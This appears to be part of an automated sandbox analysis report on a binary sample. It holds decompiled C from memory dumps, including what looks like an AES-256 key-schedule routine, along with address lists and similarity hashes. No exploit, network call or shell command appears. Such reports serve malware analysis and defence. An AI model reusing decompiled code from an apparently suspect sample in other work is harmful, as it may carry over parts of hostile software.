            				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
            				return _t274;
            			}



















            0x00402fb0
            0x00402fbf
            0x00402fc8
            0x00402fd6
            0x00402fda
            0x00402fe3
            0x00402ff4
            0x00402ff7
            0x00402ffc
            0x00403005
            0x00403013
            0x00403018
            0x00403021
            0x00403031
            0x00403051
            0x00403054
            0x00403066
            0x0040306b
            0x00403080
            0x0040309d
            0x004030a0
            0x004030b1
            0x004030c6
            0x004030e6
            0x004030e9
            0x004030fb
            0x00403119
            0x00403136
            0x00403139
            0x0040314b
            0x00403160
            0x00403166
            0x0040316e
            0x0040316f
            0x00403172
            0x00403180
            0x00403190
            0x004031a2
            0x004031b4
            0x004031d0
            0x004031e3
            0x004031f0
            0x00403201
            0x00403218
            0x0040323a
            0x0040323d
            0x0040324e
            0x00403269
            0x00403280
            0x00403283
            0x00403295
            0x0040329d
            0x004032b2
            0x004032cf
            0x004032d2
            0x004032e3
            0x00403307
            0x00403317
            0x0040331a
            0x0040332c
            0x00403344
            0x00403347
            0x0040335a
            0x00403367
            0x00403379
            0x00403391
            0x004033b4
            0x004033b7
            0x004033c9
            0x004033de
            0x004033e4
            0x004033e4
            0x004033e7
            0x004033e7
            0x00403180
            0x0040344b
            0x00403454
            0x00403462
            0x004034c0
            0x004034c9
            0x004034d7
            0x00403539
            0x00403542
            0x0040354f
            0x00403552
            0x0040359e
            0x004035aa
            0x004035b3
            0x004035c0
            0x004035c7

            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
            • Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
            • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
            • Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 96c2f874d3dc5b4d9421a7b36a81a3dd36c3f429a932a27a4c5ea318a08f9dc6
            • Instruction ID: 311544d01b54cf5998a958f2e49ab2c6f15698fde745d4e2aa2adfc5cc157add
            • Opcode Fuzzy Hash: 96c2f874d3dc5b4d9421a7b36a81a3dd36c3f429a932a27a4c5ea318a08f9dc6
            • Instruction Fuzzy Hash: C1F18FB5E1025D9BCF14DFA5C981ABEB7B6AF88710F148169EA05EB340E738DD41CB50
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4fd682e93d003c66121bab13af83d9c994676ec1831b8d550f064fde58a1a36f
            • Instruction ID: ab5a1513d957758d05fb970e8ad7abad6b9ce9cd7921467fe5f76ca83e6aea20
            • Opcode Fuzzy Hash: 4fd682e93d003c66121bab13af83d9c994676ec1831b8d550f064fde58a1a36f
            • Instruction Fuzzy Hash: 5CF1F131A08741DFDB25CB28C8507AA77E1BF95324F14862DE9998B291D738DC95CB82
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
            • Instruction ID: ebc4a1510671d85a7c33194b31e21c6206ed0b0408d2dcd8dac1eb138a7e7720
            • Opcode Fuzzy Hash: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
            • Instruction Fuzzy Hash: 61D11135B4421E8BCB21CE28C9803BAB7E9AFA4354B2D8568DE69CB342E775DC419750
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3c400925c8b61d0cfd6f7df1cf6ad3c8204cf8efdaad7441759b5ebf27c28ef5
            • Instruction ID: 0eebc243c69a6df2f9934b46bc631a8fa1ff54fdc2d52f8aeff92312eb30978a
            • Opcode Fuzzy Hash: 3c400925c8b61d0cfd6f7df1cf6ad3c8204cf8efdaad7441759b5ebf27c28ef5
            • Instruction Fuzzy Hash: AFD1EF71A002459BCB15CF6AC891BBE77B4FFA4354F188529F856DB281E734ED81CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 88adc69e3a22e007d2c67d23e6bdb822885b80eac8d68a46c3dc3e6da9809015
            • Instruction ID: 47dab8d8ebb3d48890361f01f00d90a28da272b76fb420882fc72c7e56448d4a
            • Opcode Fuzzy Hash: 88adc69e3a22e007d2c67d23e6bdb822885b80eac8d68a46c3dc3e6da9809015
            • Instruction Fuzzy Hash: 63D1B331E042998BDF2ACF9AC4943BDBBB5FB84301F24482DD546A7295D7B89DD1CB40
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ac3f945e16f013506a3ded09e7c6c473bf116255ea04e4243cc411257419961b
            • Instruction ID: 2a97eb70315ab949e76795b9d72a8c60deee9352152ad46f6f5523d3d2490a55
            • Opcode Fuzzy Hash: ac3f945e16f013506a3ded09e7c6c473bf116255ea04e4243cc411257419961b
            • Instruction Fuzzy Hash: 57E17075A04205DFCB18CF59D880AADB7F1FF48310F288169E956EB391D734E985CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8d92c68229ce5ecfde81b01b329d37747ca1a774375d54e64474cc06765e6d7e
            • Instruction ID: 847a16e972b4a5408ba0276d9d743ffa75b2f627a2bdf74fbc3cc104d4e27f2a
            • Opcode Fuzzy Hash: 8d92c68229ce5ecfde81b01b329d37747ca1a774375d54e64474cc06765e6d7e
            • Instruction Fuzzy Hash: EFE1ADB5E00649DFDB14CF98D984BAEBBF2FF89300F248069D916AB291D735AD41CB50
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d7a9fa0dceb2071c35e3ad7acf2cb4eeed3e2b1eb3b60a35c9b0e6c028537cbf
            • Instruction ID: e2cdc0327af5d37bf7b4d437fabdb2acc8a06e19122738883a2d777e8558fc77
            • Opcode Fuzzy Hash: d7a9fa0dceb2071c35e3ad7acf2cb4eeed3e2b1eb3b60a35c9b0e6c028537cbf
            • Instruction Fuzzy Hash: E2D103B2A04641EFC712DFA4C941BABB7E8FF48700F144529F58A9B291CB78ED41CB91
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
            • Instruction ID: d579e9c97353daa00c576a62f5202702411ef2803d077e6d5b6749147df989f6
            • Opcode Fuzzy Hash: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
            • Instruction Fuzzy Hash: F7B1B131B106099FDB15CBA9DA91BBEB7F5BF48300F244169E551DB382D730AE44CB61
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: aeb2f8e3e633b2b745c9e3e8f9f34aac10f10587345d3b1cefb76396eef37e88
            • Instruction ID: 223a234f66067b6177eac97a026ae0b9fd4f763e2684bdf20f851ef9d0ab3f35
            • Opcode Fuzzy Hash: aeb2f8e3e633b2b745c9e3e8f9f34aac10f10587345d3b1cefb76396eef37e88
            • Instruction Fuzzy Hash: A0B16DB4E0420DDFCB14DF98D984AAEBBB9FF44304F20452AE506AB355DB74AD52CB40
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 12e541fc8c9798199a2fc98c871ceea9245ff2aa6c7292f7eaad6590a55b9abb
            • Instruction ID: 8176035a60718a8a409ea07f39a59bebeee20b93740950c54a95afa1c7f15b9c
            • Opcode Fuzzy Hash: 12e541fc8c9798199a2fc98c871ceea9245ff2aa6c7292f7eaad6590a55b9abb
            • Instruction Fuzzy Hash: 7DB149B1900609DFCB15DFA9D940BAEBBF5FB48740F14812EE51AAB391E734AA41CF50
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f1778077fdc4c8c940becb9e9707e9b5299cad91c433194ece0f14fa1153f144
            • Instruction ID: 83ec8051d5d6e905bf81353e2c8e21e7dfcf6156dd806bf1ac7277dae215f4b6
            • Opcode Fuzzy Hash: f1778077fdc4c8c940becb9e9707e9b5299cad91c433194ece0f14fa1153f144
            • Instruction Fuzzy Hash: 38C111756097809FD354CF28C580A5AFBF1BF88304F584A6EF8998B352D771E989CB42
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: acfb1e7e3a5f169cf3aa75d36e41a1ff5cfb1e4ed11c66ef42c765106e764da4
            • Instruction ID: 45e29662e71a862be4b16d5c5ff3b6d49ed720394c36c8850a065dbbea0dcd3d
            • Opcode Fuzzy Hash: acfb1e7e3a5f169cf3aa75d36e41a1ff5cfb1e4ed11c66ef42c765106e764da4
            • Instruction Fuzzy Hash: E2912632E042189FDB219B68C845FED77B5BB09728F154261FD11AB2D1D7B49CC4CB91
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
            • Instruction ID: e92d39eda58c3abb4579bdae549ffcf62975774c7d4c683a5b2001bcc2c38b2f
            • Opcode Fuzzy Hash: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
            • Instruction Fuzzy Hash: 9D810731A152568BDB258F68C8C12FDBB65FF96302F38457ADC428B641C2359C8AE7E1
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 45d186ed425bd98296936ac389bdb7bb8e7f93e8ba3e5d02b5d7c9183d7fb9b3
            • Instruction ID: 13b298a1fb31e35e7db75a02116be5d3bb6db5129ea6bd8e024197c5428cb6b3
            • Opcode Fuzzy Hash: 45d186ed425bd98296936ac389bdb7bb8e7f93e8ba3e5d02b5d7c9183d7fb9b3
            • Instruction Fuzzy Hash: 7581E332A002198BEB24CB59D490B7EB7F1FBA5311F2A429AD8819F7C1D630ED44CB91
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2bd1da32487f206c10b5b5c524239e71a9581714dfdc135fed4de24136404ecd
            • Instruction ID: a6e0322de31958596096a94d370d6a3cc6cc816f4cab68283d2717bf6b56ddf1
            • Opcode Fuzzy Hash: 2bd1da32487f206c10b5b5c524239e71a9581714dfdc135fed4de24136404ecd
            • Instruction Fuzzy Hash: 2681E772E001158BCB08CF79C8916BEBBF1FF89311B1986BAE855DB396DA34D901CB50
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f6e8bc19f1e53ec29ed49daee63d19f8764f811622d3f100dac2f432bacc88cf
            • Instruction ID: e5171022d797de1419deac1c39e4c4ba68b8e60f45e8b73c8e3f2511187690b0
            • Opcode Fuzzy Hash: f6e8bc19f1e53ec29ed49daee63d19f8764f811622d3f100dac2f432bacc88cf
            • Instruction Fuzzy Hash: 37815C71E002198FCF18CFA8C9909FCB7B5BF49314B64426AE412AB396DB319D46CB50
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1e70873d6d3b6eb19b091e4d1f6591a0c5b90e5a01a7e052d93239b4d17e670f
            • Instruction ID: 800f698cbe67b05c0856a595f6d91e414127068fa5562897a729bf63634cb967
            • Opcode Fuzzy Hash: 1e70873d6d3b6eb19b091e4d1f6591a0c5b90e5a01a7e052d93239b4d17e670f
            • Instruction Fuzzy Hash: AE8190756082419FCB25CF14E881A7F73E5FB84791F25482AFD46AB241E330ED49CBA2
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 58f85a9f76b0cbf64e527d37d483f84936057a3a208bb22750283cf7880ea995
            • Instruction ID: e9e628d8c8d0000c18a5e677793b5b6713fa8575c23eb3d4f01d69f5e9958a02
            • Opcode Fuzzy Hash: 58f85a9f76b0cbf64e527d37d483f84936057a3a208bb22750283cf7880ea995
            • Instruction Fuzzy Hash: FF71C272A002159BDB18CF59C991BADBBF2FB89310F198269D916AF385C731ED41CB90
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d66a3ffdf7e32ac67f62618f574c2262498d772192edf34a32436c5b4c504a5b
            • Instruction ID: 4eb5a6427f8d773c117837ee96a62773445bbe00dd30d26a634910a467639582
            • Opcode Fuzzy Hash: d66a3ffdf7e32ac67f62618f574c2262498d772192edf34a32436c5b4c504a5b
            • Instruction Fuzzy Hash: 6781B271E1021A9FCB18DFA8D8806AEBBF5FF4A300F158169E456E7691EB309D11CF90
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1dc45aee2c982c73f33f0c7256a55d029467b7749b7967f21c78b25efdddf01a
            • Instruction ID: 675508d725097b01f935248361620465aba924fc17d9eb09f13e18acf50bb957
            • Opcode Fuzzy Hash: 1dc45aee2c982c73f33f0c7256a55d029467b7749b7967f21c78b25efdddf01a
            • Instruction Fuzzy Hash: F2815B70A00259AFDF18CF69C480ABAFBF1FB18304F64C16AE845EB681D3749881DF64
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2482351dc0b259adcd1d33d88a220eb827bc4ee96847804d56a2299d0921efbb
            • Instruction ID: e28dc8a953b9c06bf50b76d7fde1bc8005e7b4406ead3ac2d4c09c99b04c45bf
            • Opcode Fuzzy Hash: 2482351dc0b259adcd1d33d88a220eb827bc4ee96847804d56a2299d0921efbb
            • Instruction Fuzzy Hash: 6371E675E001299FCB14DF69C880ABEB7F1EF89314B144169E896EB785DB34DD42CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8ac81e35664cefa0ac2e783bf704cc9c55c1bd9a6fc158687d381b65fe2264f0
            • Instruction ID: d5abc14d41aa2d63eac97a084a1bd5e91108b19fed76e8750f680f3a8b529f13
            • Opcode Fuzzy Hash: 8ac81e35664cefa0ac2e783bf704cc9c55c1bd9a6fc158687d381b65fe2264f0
            • Instruction Fuzzy Hash: E771B231A0020A9BCB24CF69C8817FEB7FAEF88350F14856AE815D7292DB34DD45C790
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 952c27e872e94886e8b0d31fae2316f11739f3faee3ef7571a01add5798f2d1e
            • Instruction ID: 91d778de84bbd208040a806e1a393e0341a76948962b2bcca7eb498db1ae8a85
            • Opcode Fuzzy Hash: 952c27e872e94886e8b0d31fae2316f11739f3faee3ef7571a01add5798f2d1e
            • Instruction Fuzzy Hash: FA71D271604350AFC711DFA9C984AABBBE8FF89750F044969FD558B292D730D808CBB2
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
            • Instruction ID: 10e7d10dc9fc3569fe9cf63b385c892dc96767ce2258120005b82715161821a2
            • Opcode Fuzzy Hash: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
            • Instruction Fuzzy Hash: 50816BB5A007459FCB24CF68C541BEABBF5FF58300F10856AE996C7651E334EA85CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 32ae48c9e6c248d1dd0bd388eec6afb95aa43a45fc194c376a5f08545c6dd68d
            • Instruction ID: 1a8a25e5a83fece01568a0cdf3c89a31e79b00897a85bc4a1d0165e36b679ada
            • Opcode Fuzzy Hash: 32ae48c9e6c248d1dd0bd388eec6afb95aa43a45fc194c376a5f08545c6dd68d
            • Instruction Fuzzy Hash: 7561A371E006298BCF14CFA9C8805ADB7F6FB89324724836AD825EB7C0D7359D42DB90
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4c956b4cb332264591a9756cc49d0868d8580da62220b7e353cd952326181234
            • Instruction ID: 3fe89854e4475dfaff35f5a9533086e181ac2a3a6613bee4bff45da610df5037
            • Opcode Fuzzy Hash: 4c956b4cb332264591a9756cc49d0868d8580da62220b7e353cd952326181234
            • Instruction Fuzzy Hash: 0F711FB2210705AFD721DF28CD45F66B7B5EF84760F20C528F6698B2A1EB71E940CB60
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 29cb9142b3aaa6b71ecc952777735ca243759715847f85e21d0c8b927bbd0bc7
            • Instruction ID: f4f4d2966198485dba485c60f74c7487b496001ee8dd0489114b30a44868d6c9
            • Opcode Fuzzy Hash: 29cb9142b3aaa6b71ecc952777735ca243759715847f85e21d0c8b927bbd0bc7
            • Instruction Fuzzy Hash: 11719A34A00762EBCB24CF66C48067AB3F1FB46301F64496ED9928B680E775ED95EB50
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6a555215846437c86ef06aba17bba934fa35095e14f2a7b18d5a3baaee9d73d1
            • Instruction ID: d2ccdba01af2a5a40d8e57dce7eb3dd8d815edca6f1232d6bcde7bf96fb3ade9
            • Opcode Fuzzy Hash: 6a555215846437c86ef06aba17bba934fa35095e14f2a7b18d5a3baaee9d73d1
            • Instruction Fuzzy Hash: EB612136A002198BCB25CF58C49437FB7B1EF89300B2880B9E955DB395DB38C942CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f2513d98d8fb3b14593f7f22d9c084d42f708c82d977be58627f0782e43ba137
            • Instruction ID: 76ab7615205086546bef73c76c556f9ef20a7ab4eecf7d81a03a7d7c063dbffe
            • Opcode Fuzzy Hash: f2513d98d8fb3b14593f7f22d9c084d42f708c82d977be58627f0782e43ba137
            • Instruction Fuzzy Hash: E3817D75E0060ADFCB09CF68C480AAABBF1FF59310F148669E855DB385D734EA51CB94
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ade372b2eb468adff0cac66fda0420d33d65bb8bd0d2302a374b1850e77ad93e
            • Instruction ID: 9c299638213a5083824f9985012e3dd53646b00059c053a6c4348f55b1a8fcf0
            • Opcode Fuzzy Hash: ade372b2eb468adff0cac66fda0420d33d65bb8bd0d2302a374b1850e77ad93e
            • Instruction Fuzzy Hash: DB51FF32B006169FCB18CF9CD891A79B7F2EB99310754812EE806CB395DB34ED91CB90
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 27c37b6d7e0c2081b6e3e83f285a8b191e63be0dc1735e869adf4b3fb904fb2e
            • Instruction ID: baf7c5a2f5cdda00f2191b5ae26822e6632ed8d6c86409fdec9e9b18adb66b92
            • Opcode Fuzzy Hash: 27c37b6d7e0c2081b6e3e83f285a8b191e63be0dc1735e869adf4b3fb904fb2e
            • Instruction Fuzzy Hash: EB51E1B4700615DBCB24EF69C590A6ABBF2FF89310F24816DE44A9B341D7719D42CF60
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c90fcdbe130005330eb85e90d1769a7c9fd4a8b4ceae3cf3719a7b1f8362855c
            • Instruction ID: 8ca692408a7d94d47cc8c7a80422da212292402c2c2c57b0a211b46b185aea34
            • Opcode Fuzzy Hash: c90fcdbe130005330eb85e90d1769a7c9fd4a8b4ceae3cf3719a7b1f8362855c
            • Instruction Fuzzy Hash: 2251E279D04269CFDF31CF68C945BAEBBB0BF88714F2041ADE859AB282D7704D419B90
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 67%
            			E00402D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
            				signed int _t66;
            				signed int* _t69;
            				signed int* _t81;
            				signed int _t94;
            				signed int _t96;
            				signed int _t106;
            				signed int _t108;
            				signed int* _t110;
            				signed int _t127;
            				signed int _t129;
            				signed int _t133;
            				signed int _t152;
            				intOrPtr _t171;
            
            				_t81 = _a12;
            				_t110 = _a8;
            				asm("ror esi, 0x8");
            				asm("rol eax, 0x8");
            				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
            				_t66 =  &(_t110[1]);
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
            				asm("ror esi, 0x8");
            				asm("rol ecx, 0x8");
            				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
            				if(_a16 != 0x100) {
            					L4:
            					return _t66 | 0xffffffff;
            				} else {
            					_t171 = _a4;
            					_t69 = 0;
            					_a12 = 0;
            					while(1) {
            						_t152 =  *(_t66 + 0x18);
            						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
            						_t127 =  *_t66 ^ _t94;
            						 *(_t66 + 0x1c) = _t94;
            						_t96 =  *(_t66 + 4) ^ _t127;
            						 *(_t66 + 0x20) = _t127;
            						_t129 =  *(_t66 + 8) ^ _t96;
            						 *(_t66 + 0x24) = _t96;
            						 *(_t66 + 0x28) = _t129;
            						if(_t69 == 6) {
            							break;
            						}
            						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
            						_t133 =  *(_t66 + 0x10) ^ _t106;
            						 *(_t66 + 0x2c) = _t106;
            						_t108 =  *(_t66 + 0x14) ^ _t133;
            						 *(_t66 + 0x34) = _t108;
            						_t69 =  &(_a12[0]);
            						 *(_t66 + 0x30) = _t133;
            						 *(_t66 + 0x38) = _t108 ^ _t152;
            						_t66 = _t66 + 0x20;
            						_a12 = _t69;
            						if(_t69 < 7) {
            							continue;
            						} else {
            							goto L4;
            						}
            						goto L6;
            					}
            					return 0xe;
            				}
            				L6:
            			}
















            0x00402d93
            0x00402d98
            0x00402da0
            0x00402da9
            0x00402db3
            0x00402dba
            0x00402dc3
            0x00402dce
            0x00402dd6
            0x00402ddf
            0x00402dea
            0x00402df0
            0x00402df5
            0x00402dfe
            0x00402e09
            0x00402e11
